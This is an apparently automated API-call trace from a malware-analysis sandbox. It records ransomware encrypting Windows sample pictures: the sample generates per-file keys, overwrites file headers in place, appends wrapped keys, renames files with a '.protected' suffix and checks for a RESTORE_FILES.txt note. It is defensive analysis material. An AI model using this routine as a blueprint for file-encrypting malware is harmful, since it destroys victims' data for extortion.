[0095.815] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0095.815] StrStrW (lpFirst="Desert.jpg", lpSrch=".rar") returned 0x0 [0095.815] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0095.815] StrStrW (lpFirst="Desert.jpg", lpSrch=".zip") returned 0x0 [0095.815] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.825] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.825] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.826] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.826] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.827] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.827] CloseHandle (hObject=0xd4) returned 1 [0095.836] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.protected") returned 65 [0095.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample 
pictures\\desert.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.protected" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.protected")) returned 1 [0095.837] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.837] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.837] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.837] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.837] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.837] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.837] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned 56 [0095.837] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.837] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.837] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.837] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.839] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned 56 [0095.839] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.839] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned 56 [0095.839] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.839] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned 56 [0095.839] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.839] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x460, lpOverlapped=0x0) returned 1 [0095.841] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xfffffba0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.841] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x460, lpOverlapped=0x0) returned 1 [0095.842] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.842] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.842] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.842] CloseHandle (hObject=0xd4) returned 1 [0095.843] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.protected") returned 66 [0095.843] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), 
lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.protected" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini.protected")) returned 1 [0095.843] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.843] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="Windows") returned -1 [0095.843] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="Program Files") returned -1 [0095.844] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="Program Files (x86)") returned -1 [0095.844] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="$Recycle.bin") returned 1 [0095.844] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2="System Volume Information") returned -1 [0095.844] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0095.844] StrStrIW (lpFirst="Hydrangeas.jpg", lpSrch=".protected") returned 0x0 [0095.844] lstrcmpW (lpString1="Hydrangeas.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0095.844] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.844] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.844] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0095.844] StrStrW (lpFirst="Hydrangeas.jpg", lpSrch=".txt") returned 0x0 [0095.844] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0095.844] StrStrW (lpFirst="Hydrangeas.jpg", lpSrch=".rar") returned 0x0 [0095.844] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0095.844] StrStrW (lpFirst="Hydrangeas.jpg", lpSrch=".zip") returned 0x0 [0095.844] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.846] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.846] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.847] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.847] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.856] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.856] CloseHandle (hObject=0xd4) returned 1 [0095.857] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.protected") returned 69 [0095.857] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample 
pictures\\hydrangeas.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.protected" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.protected")) returned 1 [0095.857] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.857] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="Windows") returned -1 [0095.858] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="Program Files") returned -1 [0095.858] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="Program Files (x86)") returned -1 [0095.858] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="$Recycle.bin") returned 1 [0095.858] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="System Volume Information") returned -1 [0095.858] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0095.858] StrStrIW (lpFirst="Jellyfish.jpg", lpSrch=".protected") returned 0x0 [0095.858] lstrcmpW (lpString1="Jellyfish.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0095.858] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.858] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.859] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0095.859] StrStrW (lpFirst="Jellyfish.jpg", lpSrch=".txt") returned 0x0 [0095.859] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0095.859] StrStrW (lpFirst="Jellyfish.jpg", lpSrch=".rar") returned 0x0 [0095.859] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0095.859] StrStrW (lpFirst="Jellyfish.jpg", lpSrch=".zip") returned 0x0 [0095.859] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.861] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.861] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.862] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.862] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.882] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.882] CloseHandle (hObject=0xd4) returned 1 [0095.883] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.protected") returned 68 [0095.883] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample 
pictures\\jellyfish.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.protected" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.protected")) returned 1 [0095.884] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.884] lstrcmpiW (lpString1="Koala.jpg", lpString2="Windows") returned -1 [0095.884] lstrcmpiW (lpString1="Koala.jpg", lpString2="Program Files") returned -1 [0095.884] lstrcmpiW (lpString1="Koala.jpg", lpString2="Program Files (x86)") returned -1 [0095.884] lstrcmpiW (lpString1="Koala.jpg", lpString2="$Recycle.bin") returned 1 [0095.884] lstrcmpiW (lpString1="Koala.jpg", lpString2="System Volume Information") returned -1 [0095.884] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 54 [0095.884] StrStrIW (lpFirst="Koala.jpg", lpSrch=".protected") returned 0x0 [0095.884] lstrcmpW (lpString1="Koala.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0095.884] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.884] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.885] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 54 [0095.885] StrStrW (lpFirst="Koala.jpg", lpSrch=".txt") returned 0x0 [0095.885] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample 
Pictures\\Koala.jpg") returned 54 [0095.885] StrStrW (lpFirst="Koala.jpg", lpSrch=".rar") returned 0x0 [0095.885] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 54 [0095.885] StrStrW (lpFirst="Koala.jpg", lpSrch=".zip") returned 0x0 [0095.885] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.906] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.906] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.907] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.907] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.910] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.910] CloseHandle (hObject=0xd4) returned 1 [0095.911] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.protected") returned 64 [0095.911] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample 
Pictures\\Koala.jpg.protected" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.protected")) returned 1 [0095.912] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.912] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="Windows") returned -1 [0095.912] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="Program Files") returned -1 [0095.912] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="Program Files (x86)") returned -1 [0095.912] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="$Recycle.bin") returned 1 [0095.912] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="System Volume Information") returned -1 [0095.912] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 59 [0095.912] StrStrIW (lpFirst="Lighthouse.jpg", lpSrch=".protected") returned 0x0 [0095.912] lstrcmpW (lpString1="Lighthouse.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0095.912] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.912] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.913] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 59 [0095.913] StrStrW (lpFirst="Lighthouse.jpg", lpSrch=".txt") returned 0x0 [0095.914] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") 
returned 59 [0095.914] StrStrW (lpFirst="Lighthouse.jpg", lpSrch=".rar") returned 0x0 [0095.914] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 59 [0095.914] StrStrW (lpFirst="Lighthouse.jpg", lpSrch=".zip") returned 0x0 [0095.914] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.931] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.931] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.932] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.932] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.934] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.934] CloseHandle (hObject=0xd4) returned 1 [0095.935] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.protected") returned 69 [0095.935] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample 
Pictures\\Lighthouse.jpg.protected" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.protected")) returned 1 [0095.936] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.936] lstrcmpiW (lpString1="Penguins.jpg", lpString2="Windows") returned -1 [0095.936] lstrcmpiW (lpString1="Penguins.jpg", lpString2="Program Files") returned -1 [0095.936] lstrcmpiW (lpString1="Penguins.jpg", lpString2="Program Files (x86)") returned -1 [0095.936] lstrcmpiW (lpString1="Penguins.jpg", lpString2="$Recycle.bin") returned 1 [0095.936] lstrcmpiW (lpString1="Penguins.jpg", lpString2="System Volume Information") returned -1 [0095.936] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0095.936] StrStrIW (lpFirst="Penguins.jpg", lpSrch=".protected") returned 0x0 [0095.936] lstrcmpW (lpString1="Penguins.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0095.936] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.936] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.937] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0095.937] StrStrW (lpFirst="Penguins.jpg", lpSrch=".txt") returned 0x0 [0095.937] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0095.937] 
StrStrW (lpFirst="Penguins.jpg", lpSrch=".rar") returned 0x0 [0095.937] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0095.937] StrStrW (lpFirst="Penguins.jpg", lpSrch=".zip") returned 0x0 [0095.937] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.956] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.956] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.958] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.958] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, 